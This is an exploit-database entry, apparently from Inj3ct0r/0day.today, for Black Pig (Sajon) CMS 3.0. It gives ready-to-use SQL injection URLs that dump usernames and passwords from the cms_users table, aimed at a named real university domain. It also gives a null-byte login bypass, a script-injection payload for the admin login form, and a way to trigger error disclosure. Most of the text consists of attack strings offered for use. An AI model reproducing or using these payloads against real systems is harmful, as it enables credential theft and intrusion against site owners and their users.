Exploit for unknown platform in category web applications
=====================================================
Black Pig (Sajon) CMS 3.0 XSS / SQL Injection Exploit
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Product : Black Pig (Sajon) CMS 3.0
site: http://www.blackpig.co.uk/
Investigated the University of Cambridge. =]
The file name may change, but is vulnerable parameter key
1) SQL inj3ct0r
Example:
http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+username,2,password+from+cms_users--
http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+version(),2,concat_ws(char(58),group_concat(username+separator+0x3a),group_concat(password+separator+0x3a))+from+cms_users--
SQL inj in admin, when authorization
Example:
POST
formloginuser=%00
2) XSS
http://www.site.com/cms/admin.php
POST
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>
The same is true in goid,gopage
Admin is:
site.com/cms/
Disclosure ways:
http://www.site.com/cms/admin.php
in the login box set '
Table: cms_users
Fields: username,password
# 0day.today [2018-02-18] #